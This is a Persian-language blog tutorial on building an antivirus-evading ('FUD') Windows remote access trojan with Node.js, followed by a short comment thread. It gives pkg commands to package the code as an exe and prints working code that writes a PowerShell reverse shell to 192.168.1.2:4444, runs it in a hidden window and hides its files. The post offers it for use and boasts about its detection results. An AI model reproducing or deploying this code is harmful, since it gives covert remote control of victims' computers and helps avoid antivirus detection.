وبلاگ

آموزش ساخت رت FUD ويندوز با استفاده از Node.js

با سلام خدمت تمامی کاربران عزیز سایت Vip Security

دوباره با یک پست خیلی عالی و جذاب در خدمت شما دوستان عزیز هستیم

خب شاید براتون سوال باشه که مگه با نود جی اس ( node.js ) مگه میشه رت یا رات ویندوز ساخت؟😲 باید در پاسخ بگ که بله ! 😎

خب اول از موازد پایه روع کنیم و بعد بریم سراغ آموزش ویدیویی 🙂

رت چیست؟

مخفف کلمه (RAT) رت (Remote Access Trojan) هست و به زبان ساده (Remote Administration Tool)یعنی دسترسی از راه دور , بخوام واضع تر توضیح بدم رت به ما این امکان رو میده که بتونیم سیستم یا گوشی ها رو کنترل
کنیم , وقتی میشنوید یک گوشی هک شده و تمامی اطلاعات اون شخص پخش شده دلیلش فکر میکنید چی هست ؟ درست
فهمیدید هکر ها از رت ها برای کنترل سیستم قربانی هاشون استفاده میکنند , رت ابزاری بسیار خطرناکی هست و خیلی از هک هایی که اتفاق میفته امروزه از طریق همین رت هست. تا اینجا فهمیدیم که رت چیه 😉
 

Node.js چیست؟

js یک پلتفرم کدنویسی سمت سرور است که بر پایه موتور جاوا اسکریپت مرورگر گوگل‌ کروم کدنویسی شده استاین پلتفرم توسط رایان داهل در سال ۲۰۰۹ ایجاد شده است و در حال حاضر آخرین نسخه آن ورژن ۰٫۱۰٫۳۶ می‌باشد.

بر اساس اعلان مستندات رسمی تعریف Node.Js به شکل زیر عنوان می‌شود:

Node.js یک پلتفرم ایجاد شده بر پایه موتور جاوا اسکریپت گوگل کروم است که باعث سهولت ایجاد و مقیاس‌پذیری برنامه‌های تحت شبکه می‌شوداین پلتفرم از یک مدل I/O رویداد محور استفاده می‌کند که مسدود نشونده (non-blocking) است و همین امر باعث کاهش فشار موجود بر روی سرور و افزایش کارآیی می‌شود و این امر برای اجرای برنامه‌های مبتنی بر داده که بصورت بلادرنگ (Real-Time) بر روی سرورهای نامتمرکز استفاده می‌شوند بسیار مناسب است.”

Node.js یک پلتفرم کد باز برای گسترش برنامه‌های سمت سرور و تحت شبکه می‌باشداین پلتفرم بر اساس زبان جاوا اسکریپت نوشته شده است و میزبانی و هاست Nodejs قابلیت پیاده‌سازی بر روی سیستم‌عامل‌های ویندوز، لینوکس و سیستم عامل کامپیوترهای اپل را دارد.

این فریم ورک کتابخانه‌ای عظیم از ماژول‌های مختلف جاوا اسکریپت را فراهم می‌کند که سهولت در گسترش وب‌اپلیکیشن ها را تا حد زیادی فراهم می‌آورد.

چطور میشه از پروژه Node.js خروجی اپلیکیشن ویندوز یا لینوکس گرفت؟

خب شاید براتون عجیب باشه ولی تعجب نکنید ! این روزا از زبان جاوا اسکریپت تقریبا در همه جا استفاده میشه از وب  گرفته تا اپلیکیشن اندروید ، ios & macOs و یا لینوکس و میشه گفت آینده واقعا عالی داره

 
خب برای انجام چنین چیزی شما باید با استفاده از دستور زیر ماژول pkg رو به پروژه تون ادد کنید
				
					npm install -g pkg
				
			

 با استفاده از دستور زیر میتونید خروجی مخصوص به پلتفرم مدنظرتون رو بگیرید در اینجا اسم پروژه ما index.js هست و خروجی exe میخواهیم

				
					pkg index.js -o MyApp.exe
				
			

اگر در حین احرای دستور مشکلی داشتید حتما دستورات زیر را وارد کنید و دوباره خروجی بگیرید

				
					npm install --global windows-build-tools
npm cache clean --force
				
			

 

پیلود چیست ؟

payload در لغت به بار و محموله ای سود آور می گویند و این نام را از این جهت برای ان انتخاب کرده اند به دلیل ان که payload شامل کد های مخرب است.

پیلود FUD چیست؟

FUD یعنی Fully UnDetectable (FUD) by Anti-Virus (AV) software به زبان فارسی یعنی پیلود مخربی که توسط آنتی ویروس ها غیرقابل شناسایی است

آموزش ساخت رت ویندوز  FUD با استفاده از Node.js :

 

برای مشاهده ویدیو حتما vpn خود را روشن کنید و حتما کانال یوتوب ما رو هم دنبال کنید !

کد پروژه استفاده شده در ویدیو :

				
					
var spawn = require("child_process");
var fs = require('fs');

fs.writeFile('my.ps1',`$c = New-Object System.Net.Sockets.TCPClient("192.168.1.2",4444);
$I = $c.GetStream();
[byte[]]$U = 0..(2-shl15)|%{0};
$U = ([text.encoding]::ASCII).GetBytes("Copyright (C) 2021 Microsoft Corporation. All rights reserved.'n'n")
$I.Write($U,0,$U.Length)
$U = ([text.encoding]::ASCII).GetBytes((Get-Location).Path + '>')
$I.Write($U,0,$U.Length)
while(($k = $I.Read($U, 0, $U.Length)) -ne 0){;$D = (New-Object System.Text.UTF8Encoding).GetString($U,0, $k);
$a = (iex $D 2>&1 | Out-String );
$r  = $a + (pwd).Path + '> ';
$m = ([text.encoding]::ASCII).GetBytes($r);
$I.Write($m,0,$m.Length);
$I.Flush()};
$c.Close()`,function (err) {
  if (err) throw err;
  spawn.exec('powershell.exe -windowstyle hidden -file my.ps1 ');
  spawn.exec('attrib +h "my.ps1" | attrib +h "2.exe"');
});




				
			

 

نتیجه اسکن فایل رت در سایت virustotal:

 

 

اشتراک گذاری:

مطالب زیر را حتما مطالعه کنید

2 دیدگاه

به گفتگوی ما بپیوندید و دیدگاه خود را با ما در میان بگذارید.

  • عالی
    بعد اولین اجرا
    پاور شل end process کردم بعدش هرچی فایل باز میکنم دیگه وصل نمیشه
    و تو پس زمینه هم پاور شل در حالت اجرا نیست
    مشکل چیه؟

    • سلام دوست عزیز
      همانطور که در ویدیو گفتیم ما دسترسی شل معکوس را از طریق اسکریپت پاورشل میگیریم و در ویدیو هم گفتیم که وقتی خود فایل رت اجرایی را end process کنید دسترسی از بین نمیره ولی اما پاورشل را end process کنید دسترسی از بین میره

دیدگاهتان را بنویسید